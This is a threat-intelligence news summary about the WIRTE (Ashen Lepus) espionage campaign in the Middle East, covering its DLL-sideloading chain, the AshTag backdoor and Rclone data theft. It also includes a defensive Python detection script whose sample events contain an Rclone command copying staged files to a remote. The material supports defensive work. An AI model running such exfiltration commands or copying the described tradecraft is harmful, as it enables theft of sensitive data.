WIRTE Expands Mideast Espionage with AshTag and AshenLoader

December 11, 2025 at 12:00 AM

Overview
WIRTE, tracked by Unit 42 as Ashen Lepus, has run a persistent espionage campaign against government and diplomatic entities across the Middle East since at least 2018. Since 2020, the group has deployed a previously undocumented malware suite dubbed AshTag, delivered via AshenLoader DLL sideloading. Recent samples show expansion to Oman and Morocco, beyond earlier activity in the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt.

Scope and persistence

  • Numerous unique phishing lures across the region suggest a broad, ongoing campaign focused on government and diplomatic targets
  • More than a dozen entities have been targeted; the true number is likely higher
  • Activity continued through the Israel–Hamas conflict and after the October 2025 Gaza ceasefire, with new malware variants and hands-on operations observed

Attribution and ecosystem links

  • WIRTE overlaps with the Gaza Cyber Gang (aka Blackstem, Extreme Jackal, Molerats, TA402), sharing code and development resources while operating semi-independently
  • Cybereason links Molerats and APT-C-23 (Arid Viper/Desert Varnish/Renegade Jackal) to Hamas’s cyberwarfare division
  • Check Point (Nov 2024) tied the group to destructive attacks on Israeli entities using the SameCoin wiper, highlighting dual espionage and sabotage capability

Targeting and lures

  • Phishing themes are aligned with regional geopolitics
  • Recent rise in Turkey-related lures (e.g., “Partnership agreement between Morocco and Turkey,” “Draft resolutions concerning the State of Palestine”) indicates potential new focus on Turkey

Attack chain at a glance

  1. Phishing email delivers a benign-looking PDF decoy that prompts download of a RAR archive from a file-sharing service
  2. Opening the archive launches a renamed legitimate binary that sideloads a malicious DLL (AshenLoader)
  3. AshenLoader opens the decoy PDF to maintain cover, then contacts an external server to fetch a legitimate executable and AshenStager (stagerx64)
  4. AshenStager is sideloaded to load the malware suite in memory, minimizing forensic artifacts

Malware toolkit

  • AshenLoader: Malicious DLL used via DLL sideloading to initiate the chain and fetch additional components
  • AshenStager (stagerx64): Sideloaded component that launches payloads in memory
  • AshTag: A modular .NET backdoor masquerading as a VisualServer utility
    • Uses an AshenOrchestrator for communications and in-memory payload execution

AshTag capabilities

  • Persistence and process management
  • Update and removal
  • Screen capture
  • File exploration and management
  • System fingerprinting

Hands-on data theft

  • In at least one case, the attackers accessed a compromised host, staged diplomacy-related documents in C:\Users\Public (sourced from the victim’s email inbox), and exfiltrated them to attacker infrastructure using Rclone
  • Data theft is likely across the broader victim set, especially where advanced detection is lacking
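The attack chain and the hands-on theft above leave host telemetry that can be hunted for without any sample-specific indicator: an unsigned DLL loaded from the same user-writable folder as a renamed executable (the AshenLoader and AshenStager sideloads), documents dropped into C:\Users\Public, and Rclone run under another name. The following toy rules, added here as an example and not taken from the Unit 42 or Hacker News write-ups, run those three checks over constructed Sysmon-style events; every path, file name and PID in the sample data is hypothetical.

```python
from pathlib import PureWindowsPath

USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")   # where the sideloaded DLLs in the chain live
DOC_EXT = {".docx", ".doc", ".pdf", ".xlsx", ".eml", ".msg"}

# Constructed, Sysmon-flavoured events. Paths, names and PIDs are hypothetical, not report IoCs.
SAMPLE_EVENTS = [
    {"type": "image_load", "pid": 4100, "signed": False,             # renamed EXE loads DLL beside it
     "image": r"C:\Users\alice\AppData\Local\Temp\Rar$DIa\viewer.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\Rar$DIa\version.dll"},
    {"type": "image_load", "pid": 300, "signed": True,               # benign: signed DLL from System32
     "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\version.dll"},
    {"type": "file_create", "pid": 4100, "path": r"C:\Users\Public\agenda.docx"},
    {"type": "process", "pid": 5200, "original_name": "rclone.exe",   # rclone renamed on disk
     "image": r"C:\Users\Public\svc.exe",
     "cmdline": r"svc.exe copy C:\Users\Public remote:in --config c.conf"},
]

def _under(path, prefixes):
    return path.lower().startswith(prefixes)

def check_sideload(ev):
    """Unsigned DLL loaded from the same user-writable folder as its host EXE (chain steps 2 and 4)."""
    if ev["type"] != "image_load" or ev["signed"]:
        return None
    exe, dll = PureWindowsPath(ev["image"]), PureWindowsPath(ev["loaded"])
    if exe.parent == dll.parent and _under(str(dll), USER_WRITABLE):
        return ("dll_sideload", ev["pid"])

def check_public_staging(ev):
    """Document dropped into C:\\Users\\Public, the staging folder used in the hands-on theft."""
    p = PureWindowsPath(ev.get("path", ""))
    if ev["type"] == "file_create" and _under(str(p), ("c:\\users\\public\\",)) and p.suffix.lower() in DOC_EXT:
        return ("public_staging", ev["pid"])

def check_rclone(ev):
    """Rclone identified by PE original file name (survives renaming) copying a folder to a remote."""
    if ev["type"] != "process" or ev.get("original_name", "").lower() != "rclone.exe":
        return None
    args = ev["cmdline"].split()
    has_verb = any(a in ("copy", "sync", "move") for a in args)
    has_remote = any(":" in a and len(a.split(":")[0]) > 1 for a in args)  # name:path, not a drive letter
    return ("rclone_exfil", ev["pid"]) if has_verb and has_remote else None

def scan(events):
    """Run every rule over every event; returns (rule, pid) alerts in event order."""
    rules = (check_sideload, check_public_staging, check_rclone)
    return [hit for ev in events for rule in rules if (hit := rule(ev))]
```

Correlating the first two alerts on the same PID (a sideloaded process that then writes documents to the Public folder) is what separates this chain from a lone unsigned-DLL load by a legitimate installer.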

Bottom line
Ashen Lepus (WIRTE) remains an active and resilient espionage actor focused on Middle Eastern government and diplomatic targets. The group’s continued operations through regional conflict, expanded targeting, and evolving malware lineup (AshenLoader, AshenStager, AshTag) underscore a sustained priority on intelligence collection.

Source: The Hacker News
